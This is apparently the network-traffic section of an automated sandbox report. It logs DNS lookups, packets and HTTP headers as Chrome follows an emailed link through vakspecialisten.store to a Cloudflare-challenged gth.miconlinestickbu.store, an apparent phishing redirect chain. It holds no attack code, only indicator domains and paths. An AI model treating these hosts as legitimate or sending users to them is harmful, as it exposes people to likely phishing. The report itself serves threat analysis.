                                    May 22, 2024 17:09:58.021475077 CEST49821443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.104918957 CEST4434982035.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.105242014 CEST49820443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.105351925 CEST4434982035.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.105418921 CEST49820443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.106775999 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.106803894 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.106898069 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.107439995 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.107454062 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.111783028 CEST4434982135.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.111862898 CEST4434982135.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.111917019 CEST49821443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.112000942 CEST49821443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.112008095 CEST4434982135.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.112015963 CEST49821443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.112055063 CEST49821443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.112647057 CEST49823443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.112653971 CEST4434982335.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.112710953 CEST49823443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.113050938 CEST49823443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.113061905 CEST4434982335.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.803343058 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.803738117 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.803766012 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.805366993 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.805474043 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.806225061 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.806382895 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.806519032 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.806525946 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.806550980 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.806566954 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.821729898 CEST4434982335.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.822026968 CEST49823443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.822035074 CEST4434982335.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.822333097 CEST4434982335.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.822869062 CEST49823443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.822921038 CEST4434982335.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.823098898 CEST49823443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.823148966 CEST49823443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.823189020 CEST4434982335.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.849610090 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.951637983 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.952023983 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:58.952116966 CEST4434982235.190.80.1192.168.2.4
                                    May 22, 2024 17:09:58.952195883 CEST49822443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:59.006764889 CEST4434982335.190.80.1192.168.2.4
                                    May 22, 2024 17:09:59.006869078 CEST4434982335.190.80.1192.168.2.4
                                    May 22, 2024 17:09:59.006977081 CEST49823443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:59.007261992 CEST49823443192.168.2.435.190.80.1
                                    May 22, 2024 17:09:59.007278919 CEST4434982335.190.80.1192.168.2.4
                                    TimestampSource PortDest PortSource IPDest IP
                                    May 22, 2024 17:08:35.716331005 CEST53504051.1.1.1192.168.2.4
                                    May 22, 2024 17:08:35.728765965 CEST53534081.1.1.1192.168.2.4
                                    May 22, 2024 17:08:36.816302061 CEST53512471.1.1.1192.168.2.4
                                    May 22, 2024 17:08:37.462709904 CEST5039953192.168.2.41.1.1.1
                                    May 22, 2024 17:08:37.462852955 CEST5790353192.168.2.41.1.1.1
                                    May 22, 2024 17:08:37.496766090 CEST53579031.1.1.1192.168.2.4
                                    May 22, 2024 17:08:40.192476034 CEST5459553192.168.2.41.1.1.1
                                    May 22, 2024 17:08:40.193006992 CEST5855453192.168.2.41.1.1.1
                                    May 22, 2024 17:08:40.248859882 CEST53545951.1.1.1192.168.2.4
                                    May 22, 2024 17:08:40.248872995 CEST53585541.1.1.1192.168.2.4
                                    May 22, 2024 17:08:42.659729958 CEST5417653192.168.2.41.1.1.1
                                    May 22, 2024 17:08:42.666965008 CEST5616453192.168.2.41.1.1.1
                                    May 22, 2024 17:08:42.692297935 CEST53561641.1.1.1192.168.2.4
                                    May 22, 2024 17:08:54.649353027 CEST53597841.1.1.1192.168.2.4
                                    May 22, 2024 17:08:55.064846039 CEST138138192.168.2.4192.168.2.255
                                    May 22, 2024 17:08:55.821513891 CEST5576353192.168.2.41.1.1.1
                                    May 22, 2024 17:08:55.821814060 CEST6457553192.168.2.41.1.1.1
                                    May 22, 2024 17:08:55.837833881 CEST53645751.1.1.1192.168.2.4
                                    May 22, 2024 17:08:55.844568968 CEST53557631.1.1.1192.168.2.4
                                    May 22, 2024 17:08:56.751311064 CEST5412653192.168.2.41.1.1.1
                                    May 22, 2024 17:08:56.751494884 CEST5541253192.168.2.41.1.1.1
                                    May 22, 2024 17:08:56.774545908 CEST53541261.1.1.1192.168.2.4
                                    May 22, 2024 17:08:56.781977892 CEST53554121.1.1.1192.168.2.4
                                    May 22, 2024 17:08:57.471849918 CEST6133253192.168.2.41.1.1.1
                                    May 22, 2024 17:08:57.471980095 CEST6178853192.168.2.41.1.1.1
                                    May 22, 2024 17:08:57.493804932 CEST53613321.1.1.1192.168.2.4
                                    May 22, 2024 17:08:57.493832111 CEST53617881.1.1.1192.168.2.4
                                    May 22, 2024 17:09:00.149425030 CEST6485553192.168.2.41.1.1.1
                                    May 22, 2024 17:09:00.149931908 CEST5575853192.168.2.41.1.1.1
                                    May 22, 2024 17:09:00.159095049 CEST53648551.1.1.1192.168.2.4
                                    May 22, 2024 17:09:00.177273035 CEST53557581.1.1.1192.168.2.4
                                    May 22, 2024 17:09:01.124711990 CEST6491453192.168.2.41.1.1.1
                                    May 22, 2024 17:09:01.125127077 CEST5113353192.168.2.41.1.1.1
                                    May 22, 2024 17:09:01.139568090 CEST53649141.1.1.1192.168.2.4
                                    May 22, 2024 17:09:01.139584064 CEST53511331.1.1.1192.168.2.4
                                    May 22, 2024 17:09:01.155457973 CEST5745053192.168.2.41.1.1.1
                                    May 22, 2024 17:09:01.156574011 CEST5470153192.168.2.41.1.1.1
                                    May 22, 2024 17:09:01.190023899 CEST53547011.1.1.1192.168.2.4
                                    May 22, 2024 17:09:01.191745996 CEST53574501.1.1.1192.168.2.4
                                    May 22, 2024 17:09:04.559289932 CEST6426153192.168.2.41.1.1.1
                                    May 22, 2024 17:09:04.559815884 CEST5504353192.168.2.41.1.1.1
                                    May 22, 2024 17:09:04.570714951 CEST53642611.1.1.1192.168.2.4
                                    May 22, 2024 17:09:04.584466934 CEST53550431.1.1.1192.168.2.4
                                    May 22, 2024 17:09:13.604814053 CEST53553891.1.1.1192.168.2.4
                                    May 22, 2024 17:09:21.493583918 CEST6271653192.168.2.41.1.1.1
                                    May 22, 2024 17:09:21.493732929 CEST5452153192.168.2.41.1.1.1
                                    May 22, 2024 17:09:21.513581038 CEST53627161.1.1.1192.168.2.4
                                    May 22, 2024 17:09:21.528398991 CEST53545211.1.1.1192.168.2.4
                                    May 22, 2024 17:09:25.722309113 CEST53646761.1.1.1192.168.2.4
                                    May 22, 2024 17:09:35.272903919 CEST53593251.1.1.1192.168.2.4
                                    May 22, 2024 17:09:36.387320042 CEST53615451.1.1.1192.168.2.4
                                    May 22, 2024 17:09:57.476320028 CEST6276653192.168.2.41.1.1.1
                                    May 22, 2024 17:09:57.476545095 CEST6171653192.168.2.41.1.1.1
                                    May 22, 2024 17:09:57.483464956 CEST53627661.1.1.1192.168.2.4
                                    May 22, 2024 17:09:57.494829893 CEST53617161.1.1.1192.168.2.4
                                    TimestampSource IPDest IPChecksumCodeType
                                    May 22, 2024 17:08:37.500334978 CEST192.168.2.41.1.1.1c256(Port unreachable)Destination Unreachable
                                    May 22, 2024 17:08:42.692370892 CEST192.168.2.41.1.1.1c256(Port unreachable)Destination Unreachable
                                    May 22, 2024 17:09:00.177408934 CEST192.168.2.41.1.1.1c238(Port unreachable)Destination Unreachable
                                    May 22, 2024 17:09:21.528469086 CEST192.168.2.41.1.1.1c234(Port unreachable)Destination Unreachable
                                    May 22, 2024 17:09:25.722410917 CEST192.168.2.41.1.1.1c22e(Port unreachable)Destination Unreachable
                                    May 22, 2024 17:09:57.494910955 CEST192.168.2.41.1.1.1c21d(Port unreachable)Destination Unreachable
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    May 22, 2024 17:08:37.462709904 CEST192.168.2.41.1.1.10xf0aaStandard query (0)url12.mailanyone.netA (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:37.462852955 CEST192.168.2.41.1.1.10x9214Standard query (0)url12.mailanyone.net65IN (0x0001)false
                                    May 22, 2024 17:08:40.192476034 CEST192.168.2.41.1.1.10x2037Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:40.193006992 CEST192.168.2.41.1.1.10x68f0Standard query (0)www.google.com65IN (0x0001)false
                                    May 22, 2024 17:08:42.659729958 CEST192.168.2.41.1.1.10xa8bdStandard query (0)url12.mailanyone.netA (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:42.666965008 CEST192.168.2.41.1.1.10xda66Standard query (0)url12.mailanyone.net65IN (0x0001)false
                                    May 22, 2024 17:08:55.821513891 CEST192.168.2.41.1.1.10x47f2Standard query (0)vakspecialisten.storeA (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:55.821814060 CEST192.168.2.41.1.1.10xa67bStandard query (0)vakspecialisten.store65IN (0x0001)false
                                    May 22, 2024 17:08:56.751311064 CEST192.168.2.41.1.1.10x4e8Standard query (0)gth.miconlinestickbu.storeA (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:56.751494884 CEST192.168.2.41.1.1.10x494dStandard query (0)gth.miconlinestickbu.store65IN (0x0001)false
                                    May 22, 2024 17:08:57.471849918 CEST192.168.2.41.1.1.10x9063Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:57.471980095 CEST192.168.2.41.1.1.10x6420Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                    May 22, 2024 17:09:00.149425030 CEST192.168.2.41.1.1.10x26bbStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:00.149931908 CEST192.168.2.41.1.1.10xd6acStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                    May 22, 2024 17:09:01.124711990 CEST192.168.2.41.1.1.10x3affStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:01.125127077 CEST192.168.2.41.1.1.10xac2fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                    May 22, 2024 17:09:01.155457973 CEST192.168.2.41.1.1.10x8c1dStandard query (0)gth.miconlinestickbu.storeA (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:01.156574011 CEST192.168.2.41.1.1.10x2bb5Standard query (0)gth.miconlinestickbu.store65IN (0x0001)false
                                    May 22, 2024 17:09:04.559289932 CEST192.168.2.41.1.1.10xd1faStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:04.559815884 CEST192.168.2.41.1.1.10xccbaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                    May 22, 2024 17:09:21.493583918 CEST192.168.2.41.1.1.10x19e7Standard query (0)vakspecialisten.storeA (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:21.493732929 CEST192.168.2.41.1.1.10xef02Standard query (0)vakspecialisten.store65IN (0x0001)false
                                    May 22, 2024 17:09:57.476320028 CEST192.168.2.41.1.1.10xb4f7Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:57.476545095 CEST192.168.2.41.1.1.10xb7adStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    May 22, 2024 17:08:37.478665113 CEST1.1.1.1192.168.2.40xf0aaNo error (0)url12.mailanyone.neturl12.mailanyone.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                    May 22, 2024 17:08:37.496766090 CEST1.1.1.1192.168.2.40x9214No error (0)url12.mailanyone.neturl12.mailanyone.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                    May 22, 2024 17:08:40.248859882 CEST1.1.1.1192.168.2.40x2037No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:40.248872995 CEST1.1.1.1192.168.2.40x68f0No error (0)www.google.com65IN (0x0001)false
                                    May 22, 2024 17:08:42.672207117 CEST1.1.1.1192.168.2.40xa8bdNo error (0)url12.mailanyone.neturl12.mailanyone.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                    May 22, 2024 17:08:42.692297935 CEST1.1.1.1192.168.2.40xda66No error (0)url12.mailanyone.neturl12.mailanyone.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                    May 22, 2024 17:08:52.382445097 CEST1.1.1.1192.168.2.40xf6f0No error (0)windowsupdatebg.s.llnwi.net87.248.205.0A (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:55.844568968 CEST1.1.1.1192.168.2.40x47f2No error (0)vakspecialisten.store172.67.146.167A (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:55.844568968 CEST1.1.1.1192.168.2.40x47f2No error (0)vakspecialisten.store104.21.57.150A (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:55.899629116 CEST1.1.1.1192.168.2.40x1969No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                    May 22, 2024 17:08:55.899629116 CEST1.1.1.1192.168.2.40x1969No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:56.774545908 CEST1.1.1.1192.168.2.40x4e8No error (0)gth.miconlinestickbu.store104.21.21.44A (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:56.774545908 CEST1.1.1.1192.168.2.40x4e8No error (0)gth.miconlinestickbu.store172.67.196.101A (IP address)IN (0x0001)false
                                    May 22, 2024 17:08:56.781977892 CEST1.1.1.1192.168.2.40x494dNo error (0)gth.miconlinestickbu.store65IN (0x0001)false
                                    May 22, 2024 17:08:57.493804932 CEST1.1.1.1192.168.2.40x9063No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:00.159095049 CEST1.1.1.1192.168.2.40x26bbNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:00.159095049 CEST1.1.1.1192.168.2.40x26bbNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:00.177273035 CEST1.1.1.1192.168.2.40xd6acNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                    May 22, 2024 17:09:01.139568090 CEST1.1.1.1192.168.2.40x3affNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:01.139568090 CEST1.1.1.1192.168.2.40x3affNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:01.139584064 CEST1.1.1.1192.168.2.40xac2fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                    May 22, 2024 17:09:01.190023899 CEST1.1.1.1192.168.2.40x2bb5No error (0)gth.miconlinestickbu.store65IN (0x0001)false
                                    May 22, 2024 17:09:01.191745996 CEST1.1.1.1192.168.2.40x8c1dNo error (0)gth.miconlinestickbu.store104.21.21.44A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:01.191745996 CEST1.1.1.1192.168.2.40x8c1dNo error (0)gth.miconlinestickbu.store172.67.196.101A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:04.570714951 CEST1.1.1.1192.168.2.40xd1faNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:04.570714951 CEST1.1.1.1192.168.2.40xd1faNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:04.584466934 CEST1.1.1.1192.168.2.40xccbaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                    May 22, 2024 17:09:08.176791906 CEST1.1.1.1192.168.2.40x51cfNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                    May 22, 2024 17:09:08.176791906 CEST1.1.1.1192.168.2.40x51cfNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:21.513581038 CEST1.1.1.1192.168.2.40x19e7No error (0)vakspecialisten.store172.67.146.167A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:21.513581038 CEST1.1.1.1192.168.2.40x19e7No error (0)vakspecialisten.store104.21.57.150A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:21.528398991 CEST1.1.1.1192.168.2.40xef02No error (0)vakspecialisten.store65IN (0x0001)false
                                    May 22, 2024 17:09:28.687458992 CEST1.1.1.1192.168.2.40x8510No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                    May 22, 2024 17:09:28.687458992 CEST1.1.1.1192.168.2.40x8510No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:48.555080891 CEST1.1.1.1192.168.2.40x7e23No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                    May 22, 2024 17:09:48.555080891 CEST1.1.1.1192.168.2.40x7e23No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                    May 22, 2024 17:09:57.483464956 CEST1.1.1.1192.168.2.40xb4f7No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                    • fs.microsoft.com
                                    • https:
                                      • vakspecialisten.store
                                      • gth.miconlinestickbu.store
                                      • challenges.cloudflare.com
                                    • a.nel.cloudflare.com
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.4497462.19.244.127443
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:08:41 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    Accept-Encoding: identity
                                    User-Agent: Microsoft BITS/7.8
                                    Host: fs.microsoft.com
                                    2024-05-22 15:08:41 UTC466INHTTP/1.1 200 OK
                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                    Content-Type: application/octet-stream
                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                    Server: ECAcc (lpl/EF06)
                                    X-CID: 11
                                    X-Ms-ApiVersion: Distribute 1.2
                                    X-Ms-Region: prod-weu-z1
                                    Cache-Control: public, max-age=90073
                                    Date: Wed, 22 May 2024 15:08:41 GMT
                                    Connection: close
                                    X-CID: 2


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.4497492.19.244.127443
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:08:42 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    Accept-Encoding: identity
                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                    Range: bytes=0-2147483646
                                    User-Agent: Microsoft BITS/7.8
                                    Host: fs.microsoft.com
                                    2024-05-22 15:08:42 UTC534INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                    ApiVersion: Distribute 1.1
                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                    X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                    Cache-Control: public, max-age=90112
                                    Date: Wed, 22 May 2024 15:08:42 GMT
                                    Content-Length: 55
                                    Connection: close
                                    X-CID: 2
                                    2024-05-22 15:08:42 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.449767172.67.146.1674433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:08:56 UTC715OUTGET /noki/x-cp-Ruytfvb6hnx.php HTTP/1.1
                                    Host: vakspecialisten.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    Referer: https://url12.mailanyone.net/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:08:56 UTC641INHTTP/1.1 302 Found
                                    Date: Wed, 22 May 2024 15:08:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://gth.miconlinestickbu.store
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cGErlPsFlGqx9JR7xhCYskAtetnkKpLATc%2FeTK%2BO4lkVtHylhg%2BEy9dDzGGzgW2opmv%2F7fJU9RnN4u6%2BNSJJMYOrIdekNROpD%2F0gCMVscNqLaaKO%2FymwuNH20mkXKOX02DUGJl%2FYAgc%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887db9753bee15a3-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:08:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.449770104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:08:57 UTC695OUTGET / HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Referer: https://url12.mailanyone.net/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:08:57 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:08:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16383
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:08:57 UTC761INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 74 6d 67 6b 62 58 64 31 50 35 46 70 6f 34 63 68 34 54 50 55 70 69 41 57 55 59 53 6a 6e 33 57 50 4a 73 6b 48 63 78 65 54 63 57 30 49 33 55 4d 30 35 36 4d 69 43 6f 6c 71 55 4d 38 2b 6a 48 30 67 6b 34 50 4f 67 70 73 52 64 47 65 2b 47 53 30 56 48 75 31 74 59 34 5a 76 56 73 2f 35 79 57 55 66 72 52 53 76 50 52 72 36 38 52 42 4b 52 4a 31 54 2f 48 63 53 55 47 61 56 31 45 55 68 7a 51 50 2f 46 49 45 38 42 5a 42 62 55 49 6c 47 71 6f 47 77 41 50 42 2f 6c 67 3d 3d 24 62 47 62 48 66 6c 4b 39 63 53 53 38 53 43 2f 51 49 6f 78 69 53 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: tmgkbXd1P5Fpo4ch4TPUpiAWUYSjn3WPJskHcxeTcW0I3UM056MiColqUM8+jH0gk4POgpsRdGe+GS0VHu1tY4ZvVs/5yWUfrRSvPRr68RBKRJ1T/HcSUGaV1EUhzQP/FIE8BZBbUIlGqoGwAPB/lg==$bGbHflK9cSS8SC/QIoxiSA==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
